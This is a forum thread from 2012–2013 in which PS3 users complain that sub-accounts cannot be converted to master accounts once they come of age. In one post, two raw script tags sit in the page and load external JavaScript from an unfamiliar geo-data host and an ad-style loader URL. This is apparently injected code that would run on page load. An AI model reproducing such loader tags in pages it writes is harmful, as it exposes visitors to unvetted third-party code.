First Son
2 posts

Re: Suggestion: Ability to change Sub-Account to Master Account

Sep 18, 2012
Whooa. Calm down there buddy. He has a right to say what he wants without someone having a tantrum over it. So how about YOU act YOUR age. Yeesh! People these days -__-
Message 11 of 20 (785 Views)
0 Likes
First Son
2 posts

Sep 18, 2012
And also I completely agree with everyone on here. Its actually ridiculous that this hasn't been fixed yet... I mean I'm going on 19 here. I should at least be able to use Facebook -____- *sigh. Sony, Sony, Sony.
Message 12 of 20 (782 Views)
0 Likes
First Son
1 posts

Sep 23, 2012

Yea I feel you they should really fix that because my brother bought me the ps3 and that was when it came out his the master and I have the sub acct,but he hasn't touch the ps3 in over a year. Basically I'm stuck buying things on another master account that I made,but sometimes I buy things and the sub account can't use it. On top of that I didn't think a situation like this would ever occur,but I guess I make a new account and loose everything I've done in the last 4 years of playing ps3 or switch to Xbox360. Hopefully Sony realizes that there doing a horrible job cause when the playstation4 comes out I might have doubt on buying it. I really hope they do an update to fix it before Resident Evil 5 comes out cause I want to buy every single add-on for it.

Message 13 of 20 (774 Views)
0 Likes
Wastelander
766 posts

Sep 23, 2012

whats so good about master account, well my account is master account but also all the other accounts on my ps3 seem the same no difference

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 14 of 20 (771 Views)
0 Likes
Survivor
2607 posts

Sep 24, 2012

They might work, but make sure that the person has permission from the Master Account to break off.

Deadly Neurotoxin!
 photo rsz_1rsz_11rsz_1000px-fpsword_zps44b9ca31.png
Message 15 of 20 (762 Views)
0 Likes
First Son
1 posts

Dec 27, 2012

Yeah, I feel the same way.  I am a level 13 Trophy Collector, which took quite some time.

I'm almost Twenty Years Old, and yet I've got this child block of a Sub Account.  Sony needs to update Network to make this option available.

Message 16 of 20 (595 Views)
0 Likes
First Son
1 posts

Feb 20, 2013
Im turning 19 i did a week before i truned 18 last year and i was assuming it was just gonna update it to it and i dont want to make a neither due to not wanting to buy new season pass and extendede things oh and want to keep my trophies they need to fix this i mean if they require u to put your age then they should exleast update it maybe at teh beging and ending of a month or somethin
Message 17 of 20 (424 Views)
0 Likes
First Son
1 posts

Feb 21, 2013

I would just like to thank sony for their random "loyalty"  distribution of money... really wish i was among them and hope they pick there words more wisely as well as methods.

Message 18 of 20 (423 Views)
0 Likes
First Son
1 posts

May 1, 2013
The difference is a sub account has more restrictions you can't add funds if you do you have to sign into the master account, which will kick whoever is on the master account off, delete their credit card information enter yours plus you have to keep up with two passwords the sub and master to get through account management. It's just alot of work and plus subaccount can't sync with Facebook if you wanted to do so.
Message 19 of 20 (333 Views)
0 Likes
I Only Post Everything
1257 posts

Jul 2, 2013

Please, Sony, fix it! If you don't, I'll have to start anew with the PS4. :smileysad:

Message 20 of 20 (195 Views)
0 Likes